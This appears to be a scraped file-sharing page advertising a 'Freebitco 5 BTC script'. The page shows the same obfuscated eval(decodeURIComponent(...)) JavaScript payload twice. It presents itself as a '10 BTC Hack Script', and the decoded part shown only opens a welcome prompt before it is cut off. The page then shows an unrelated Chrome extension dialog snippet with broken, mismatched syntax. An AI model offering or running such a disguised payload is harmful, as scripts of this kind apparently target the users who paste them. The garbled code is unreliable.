0% found this document useful (0 votes)
22K views2 pages

Freebitco in 5 BTC Script 2 PDF Free

eval(decodeURIComponent(decodeURIComponent(decodeURIComponent('%76%61%72%25%32%30%7 7%38%75%67%6F%25%32%30%25%33%44%25%32%30%77%69%6E%64%6F%77%2E%63%6F%6E%66%69%72%6D %28%25%32%32%21%21%57%65%6C%63%6F%6D%65%25%32%30%74%6F%25%32%30%6D %65%67%61%62%74%63%6D%61%6B %65%72%21%25%32%30%31%30%25%32%30%42%54%43%25%32%30%48%61%63%6B %25%32%30%53%63%72%69%70%74%56%35%2E%30%2E%35%25%32%30%43%4C%49%43%4B%25%32%30%4F %4B%25%32%30%74%6F%25%32%30%43%6F%6E%74%69%6E %75%65%21%21%25%32%32%29%25%33%42%25%30%44%25%

Uploaded by

Taylor Sisson
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
22K views2 pages

Freebitco in 5 BTC Script 2 PDF Free

eval(decodeURIComponent(decodeURIComponent(decodeURIComponent('%76%61%72%25%32%30%7 7%38%75%67%6F%25%32%30%25%33%44%25%32%30%77%69%6E%64%6F%77%2E%63%6F%6E%66%69%72%6D %28%25%32%32%21%21%57%65%6C%63%6F%6D%65%25%32%30%74%6F%25%32%30%6D %65%67%61%62%74%63%6D%61%6B %65%72%21%25%32%30%31%30%25%32%30%42%54%43%25%32%30%48%61%63%6B %25%32%30%53%63%72%69%70%74%56%35%2E%30%2E%35%25%32%30%43%4C%49%43%4B%25%32%30%4F %4B%25%32%30%74%6F%25%32%30%43%6F%6E%74%69%6E %75%65%21%21%25%32%32%29%25%33%42%25%30%44%25%

Uploaded by

Taylor Sisson
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

// know popup window

var dialogUtils = (function () {


"use strict";

let dialogResolvers = new Map()


let dialogArgs = new Map()

return {
setDialogResult(win_id, response) {
if(!dialogResolvers.has(win_id))
throw new Error("dialogUtils error: bad dialog id")
dialogResolvers.get(win_id)(response)
dialogResolvers.delete(win_id)
dialogArgs.delete(win_id)
},

getDialogArgs(win_id) {
if(!dialogArgs.has(win_id))
throw new Error("dialogUtils error: bad dialog id")
return dialogArgs.get(win_id)
},

openDialog(url, name, args = {}, pos) {


return new Promise(function(resolve, reject) {
chrome.windows.create({
url: url,
type: "popup",
width: pos && pos.width || undefined,
height: pos && pos.height || undefined,
left: pos && pos.left || undefined,
top: pos && pos.top || undefined,
}, function(w) {
dialogArgs.set(w.id, args}
dialogResolvers.set(w.id, resolve
}}
}}
}
}

You might also like